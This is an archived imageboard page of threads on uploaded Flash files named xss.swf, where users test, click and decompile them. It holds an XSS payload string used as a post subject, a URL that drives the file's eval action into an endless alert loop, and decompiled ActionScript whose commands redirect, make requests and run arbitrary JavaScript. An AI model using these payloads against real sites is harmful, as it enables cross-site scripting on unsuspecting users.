| STORY LOOP FURRY PORN GAMES • C • SERVICES [?] [R] RND POPULAR | Archived flashes: 229671 |
| /disc/ · /res/ — /show/ · /fap/ · /gg/ · /swf/ | P0001 · P2596 · P5191 |
| STORY LOOP FURRY PORN GAMES • C • SERVICES [?] [R] RND POPULAR | Archived flashes: 229671 |
| /disc/ · /res/ — /show/ · /fap/ · /gg/ · /swf/ | P0001 · P2596 · P5191 |
Visit the flash's index page for basic data and a list of seen names.
Threads (3):
File: test.swf-(5 KB, 550x400, Other) [_] Johnyfffffffff Johnyfffffffff 2398195 Johnyfffffffff >> [_] Anon 2398221 I don't think the xss worked on me. noscript for lyfe. cool shit though >> [_] Anon 2398250 This is what I got. Latest Mozilla Firefox (29.0.1). NoScript not installed. http://gyazo.com/db0e942bad7c0a83aa6600a 6d3f8fd3d >> [_] Anon 2398253 I don't know if I like what this stuff is supposed to do, because I do not know what it is supposed to do.
File: xss.swf-(5 KB, 550x400, Other) [_] "><img src=x onerror=alert(1)> LALKA"><img src=x onerror=alert(1)> 2380367 "><img src=x onerror=alert(1)> >> [_] Anon 2380380 >># I am afraid to click. >> [_] Anon 2380382 >># Someone click and post results if possible >> [_] Anon 2380384 >># Here goes. >> [_] Anon 2380387 >># Just some instructions on how to link things. >> [_] Anon 2380389 I used the embed button out of fear. Nothing happened, and scans seems to indicate it didn't do anything either. It was saying repeatedly "lol! cool :3" on another /f/ thread. >> [_] Anon 2380391 >># Open it with Google Chrome, it displays some kind of instructions. >> [_] Anon 2380393 >># >># Honestly? >> [_] Anon 2380394 >># Yup. >> [_] Anon 2380395 http://i.4cdn.org/f/xss.swf?a=eval&c=whi le(true){alert(%22hello!%20:3%22)} >> [_] Anon 2380397 Wow, okay. That's... neat. >> [_] Anon 2380438 >># Correction: it displays instructions in an alert window. >> [_] Anon 2380441 Decompiled. It's an xss vulnerability tester. Nothing bad here. public function attack(param1) { var _loc_2:URLLoader = null; var _loc_3:String = null; switch(param1){ case "location":{ navigateToURL(new URLRequest(this.cmd), "_self"); break; } case "open":{ navigateToURL(new URLRequest(this.cmd), "_blank"); break; } case "get":{ _loc_2 = new URLLoader(new URLRequest(this.cmd)); _loc_2.addEventListener(Event.COMPLETE, this.get_complete); _loc_2.addEventListener(SecurityErrorEve nt.SECURITY_ERROR, this.get_sec_error); break; } case "eval":{ ExternalInterface.call("eval", this.cmd); break; } >> [_] Anon 2380442 >># default:{ _loc_3 = "a(action) - c(cmd)\n"; _loc_3 = _loc_3 + "-----------------\n"; _loc_3 = _loc_3 + "1. location to url: xss.swf?a=location&c=http://www.google.c om/\n"; _loc_3 = _loc_3 + "2. open url to new window: xss.swf?a=open&c=http://www.google.com/\ n"; _loc_3 = _loc_3 + "3. http request to url: xss.swf?a=get&c=http://www.google.com/\n "; _loc_3 = _loc_3 + "4. eval js codz: xss.swf?a=eval&c=alert(document.domain)\ n"; _loc_3 = _loc_3 + "-----------------\n"; _loc_3 = _loc_3 + "by evilcos@gmail.com"; ExternalInterface.call("alert", _loc_3); break; break; } } stop(); return; } >> [_] Anon 2380449 it opened a gmail window weird >> [_] Anon 2380486 >># What's did you use for that if you don't mind?
File: xss.swf-(5 KB, 550x400, Other) [_] test test 2375252 test >> [_] Anon 2375263 gj anon >> [_] Anon 2375268 and the point of that was? >> [_] Anon 2375269 Nice try, not clicking that button. >> [_] Anon 2375280 I'M BEING HACKED HELP >> [_] Anon 2375328 >https://github.com/evilcos/xss.swf >5 KB Most likely not even his. It's supposed to open to www.google.com to check for SWF vulnerability. | ||||||||||||||||||||||
|
|
